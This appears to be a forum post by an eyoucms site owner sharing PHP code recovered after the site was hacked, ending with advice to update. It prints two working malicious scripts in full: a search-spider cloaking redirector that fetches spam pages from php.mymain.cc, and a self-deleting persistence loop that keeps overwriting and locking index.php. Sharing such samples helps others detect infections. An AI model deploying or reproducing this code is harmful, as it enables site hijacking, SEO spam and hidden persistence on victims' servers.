##这里是一个 百度搜索跳转代码##
<?php
//header('Content-Type:text/html;charset=gb2312');
set_time_limit(0);
error_reporting(0);
$tr = "stristr";
$er = $_SERVER;
function httpGet($url) {
$ch = curl_init();
//设置选项,包括URL
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; '.$er['HTTP_USER_AGENT'].'/2.0; +http://www.baidu.com/search/spider.html)');
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
//执行并获取HTML文档内容
$output = curl_exec($ch);
//释放curl句柄
curl_close($ch);
//打印获得的数据
return $output;
}
$filename1 = @end(explode('/', $url1));
function set_writeable($file_name)
{
@chmod($file_name, 0444);
}
@chmod(__FILE__, 0444);
set_writeable($filename1);
define('url',$er['REQUEST_URI']);
define('ref',$er['HTTP_REFERER']);
define('ent',$er['HTTP_USER_AGENT']);
define('site',"http://php.mymain.cc/");
define('road',"/?" .$er['HTTP_HOST'] . url);
define('regs','@Baidu|Sogou|Baiduspider|Yisou|360|360Spider|YisouSpider|Spider|So.com|Sm.cn@i');
define('area',$tr(url,".xml") or $tr(url,".doc") or $tr(url,".pdf") or $tr(url,".txt") or $tr(url,".ppt") or $tr(url,".pptx") or $tr(url,".xls") or $tr(url,".csv") or $tr(url,".shtml") or $tr(url,".tacc")or $tr(url,".ga")or $tr(url,".asp")or $tr(url,".aspx")or $tr(url,".gq")or $tr(url,".html") or $tr(url,".xlsx") and $tr(url,"?"));
if (area && preg_match(regs, ref)) {
echo file_get_contents("http://php.mymain.cc/1.html");
exit;
}
if (preg_match(regs, ent)) {
if (area) {
echo httpGet(site.road);
exit;
} else {
echo httpGet("http://php.mymain.cc/al.php");
ob_flush();
flush();
}
}
?>
<?php
@unlink($_SERVER['SCRIPT_FILENAME']); //删除自身
error_reporting(0); //禁用错误报告
ignore_user_abort(true); //忽略与用户的断开,用户浏览器断开后继续执行
set_time_limit(0); //执行不超时
$js = '3.txt'; //用来判断是否终止执行锁定(解锁)的文件标记
$mb = 'index.php'; //要锁定的文件路径
$rn = 'suoding.php'; //要锁定的内容
$nr = file_get_contents($rn); //从文件中读取要锁定的内容
@unlink($rn); //删除“要锁定的文件内容”,不留痕迹
//创建一个后台执行的死循环
while (1==1) {
//先判断是否需要解除锁定,防止后台死循环造成各种冲突
if (file_exists($js)) {
@unlink($js); //删除解锁文件
exit(); //终止程序
}
else {
@unlink($mb); //先删除目标文件
chmod($mb, 0777); //设置属性
@unlink($mb); //先删除目标文件
file_put_contents($mb, $nr); //锁定内容 //$fk = fopen($mb, w); fwrite($fk, $nr); fclose($fk);
chmod($mb, 0444); //设置属性
usleep(9999000000); //等待1秒
}
};
?>
这是一个eyoucms网站被挂彩之后,从代码中找出来的部分。可以参考一下。
是怎样上传的代码 我查询了 uploads里的文件也没有找到非图片相关的文件
请大家还是尽快更新最新版本的eyoucms